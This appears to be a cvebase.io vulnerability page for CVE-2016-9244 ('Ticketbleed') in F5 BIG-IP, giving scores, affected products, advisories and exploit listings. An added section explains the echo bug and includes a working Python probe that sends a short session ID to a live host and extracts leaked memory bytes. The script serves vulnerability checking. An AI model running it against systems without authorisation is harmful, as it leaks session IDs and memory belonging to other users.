Public exploit available: public proof-of-concept or exploit code exists (Exploit-DB / Metasploit / Nuclei).

CVE-2016-9244

Severity: 7.5 HIGH
EPSS: 67.5% (top 1.43%)
CISA KEV: Not in KEV
Exploit: PoC available (public exploit / PoC exists)
Timeline: Published Feb 9 (2017, matching the CVE List entry date); latest update May 14 (2022, matching the GHSA entry date)

Description

A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninitialized memory. A remote attacker may exploit this vulnerability to obtain Secure Sockets Layer (SSL) session IDs from other sessions. It is possible that other data from uninitialized memory may be returned as well.
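The description does not spell out the mechanism, so here is the check a practitioner runs for it. Ticketbleed is an echo bug: the client's session ID is copied into a fixed 32-byte buffer and, when a session ticket is offered, the affected BIG-IP echoes all 32 bytes in its ServerHello instead of only the bytes the client sent. Sending a 1-byte session ID therefore yields the 31 bytes of leaked memory the advisory describes. The script below is an added example, not code from cvebase.io, F5, or the Exploit-DB entries: it builds a TLS 1.2 ClientHello with a short session ID and a SessionTicket extension, parses the ServerHello, and reports any surplus session-ID bytes. The two sample responses are constructed inline so the parsing and verdict logic runs offline. The published testers first complete a full handshake to obtain a real ticket and then resume with it; `probe()` lets you pass such a ticket in, and the default of an empty SessionTicket extension is an assumption that may not exercise the bug on every build, so treat the live probe as a starting point rather than a definitive negative.

```python
import os
import socket
import struct
from typing import Optional, Tuple

SESSION_TICKET_EXT = 0x0023          # RFC 5077 SessionTicket extension
HANDSHAKE = 0x16                     # TLS record content type
CLIENT_HELLO, SERVER_HELLO = 0x01, 0x02


def _ext(ext_type: int, data: bytes) -> bytes:
    """Encode one TLS extension as type(2) | length(2) | data."""
    return struct.pack(">HH", ext_type, len(data)) + data


def build_client_hello(session_id: bytes = b"\x01", ticket: bytes = b"") -> bytes:
    """TLS 1.2 ClientHello record with a deliberately short session ID and a
    SessionTicket extension. `ticket` should be a ticket from an earlier full
    handshake; an empty ticket is an assumption and may not trigger the echo."""
    if not 1 <= len(session_id) <= 32:
        raise ValueError("session ID must be 1..32 bytes")
    # ECDHE-RSA-AES128-GCM-SHA256, RSA-AES128-CBC-SHA, RSA-AES256-CBC-SHA
    suites = struct.pack(">3H", 0xC02F, 0x002F, 0x0035)
    exts = (
        _ext(SESSION_TICKET_EXT, ticket)
        + _ext(0x000A, struct.pack(">H2H", 4, 0x0017, 0x001D))          # supported_groups: P-256, X25519
        + _ext(0x000D, struct.pack(">H3H", 6, 0x0401, 0x0403, 0x0804))  # signature_algorithms
    )
    body = (
        b"\x03\x03" + os.urandom(32)                      # client_version, client_random
        + bytes([len(session_id)]) + session_id
        + struct.pack(">H", len(suites)) + suites
        + b"\x01\x00"                                     # compression methods: null only
        + struct.pack(">H", len(exts)) + exts
    )
    hs = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([HANDSHAKE, 0x03, 0x01]) + struct.pack(">H", len(hs)) + hs


def server_hello_session_id(data: bytes) -> Optional[bytes]:
    """Session ID from the first ServerHello in a TLS record stream, or None
    if the peer answered with something else (an Alert, a truncated record)."""
    off = 0
    while off + 5 <= len(data):
        ctype, _ver, rlen = struct.unpack(">BHH", data[off:off + 5])
        body = data[off + 5:off + 5 + rlen]
        off += 5 + rlen
        if ctype != HANDSHAKE:
            return None
        hoff = 0
        while hoff + 4 <= len(body):          # a record may carry several handshake messages
            htype = body[hoff]
            hlen = int.from_bytes(body[hoff + 1:hoff + 4], "big")
            msg = body[hoff + 4:hoff + 4 + hlen]
            hoff += 4 + hlen
            if htype == SERVER_HELLO:
                if len(msg) < 35:             # version(2) + random(32) + sid_len(1)
                    return None
                sid_len = msg[34]
                return msg[35:35 + sid_len]
    return None


def check_ticketbleed(sent_session_id: bytes, response: bytes) -> Tuple[bool, bytes]:
    """A conforming server echoes the session ID it received (or an empty one).
    Any bytes beyond what we sent are memory the server should not have returned."""
    echoed = server_hello_session_id(response)
    if echoed is None or len(echoed) <= len(sent_session_id):
        return False, b""
    return True, echoed[len(sent_session_id):]


def probe(host: str, port: int = 443, ticket: bytes = b"", timeout: float = 5.0) -> Tuple[bool, bytes]:
    """Live check of one virtual server. Only run against systems you are authorised to test."""
    sent = b"\x01"
    response = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_client_hello(sent, ticket))
        try:
            while server_hello_session_id(response) is None and len(response) < 16384:
                chunk = s.recv(4096)
                if not chunk:
                    break
                response += chunk
        except socket.timeout:
            pass
    return check_ticketbleed(sent, response)


def _fake_server_hello(session_id: bytes) -> bytes:
    """Constructed ServerHello record (sample input, not captured traffic)."""
    body = (b"\x03\x03" + bytes(32) + bytes([len(session_id)]) + session_id
            + b"\xc0\x2f" + b"\x00" + b"\x00\x00")   # suite, null compression, no extensions
    hs = bytes([SERVER_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([HANDSHAKE, 0x03, 0x03]) + struct.pack(">H", len(hs)) + hs


SENT_SID = b"\x01"
# Constructed: a patched server echoes the single byte it was given ...
SAFE_RESPONSE = _fake_server_hello(SENT_SID)
# ... while an affected BIG-IP pads the echo to 32 bytes with whatever was in the buffer.
VULNERABLE_RESPONSE = _fake_server_hello(SENT_SID + bytes(range(0xA0, 0xBF)))

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        vuln, leaked = probe(sys.argv[1])
    else:
        vuln, leaked = check_ticketbleed(SENT_SID, VULNERABLE_RESPONSE)
    print("VULNERABLE" if vuln else "not vulnerable", leaked.hex())
```

Run it with no arguments to see the verdict on the constructed vulnerable response, or with a hostname to probe a live virtual server. The verdict compares lengths rather than contents because the leaked bytes vary from connection to connection; an affected system shows a different 31-byte tail on every probe, which is also how the Exploit-DB entries listed below harvest session IDs from other clients.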

CVSS vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Exploitability: 3.9 | Impact: 3.6

Affected Packages (10 packages)

NVD: f5/big-ip_analytics (13 versions, +12)
NVD: f5/big-ip_link_controller (13 versions, +12)

🔴 Vulnerability Details (2)

GHSA: GHSA-5855-8rvh-x38f: A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninit ... (2022-05-14)
CVE List: CVE-2016-9244: A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninit ... (2017-02-09)

💥 Exploits & PoCs (2)

Exploit-DB: F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure (2017-02-14)
Exploit-DB: F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure (2017-02-10)

📋 Vendor Advisories (1)

F5: CVE-2016-9244: A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled ... (2017-02-09)

🕵️ Threat Intelligence (1)

Talos: Cisco Coverage for 'Ticketbleed' (2017-02-10)
CVE-2016-9244 (HIGH CVSS 7.5) | A BIG-IP virtual server configured | cvebase.io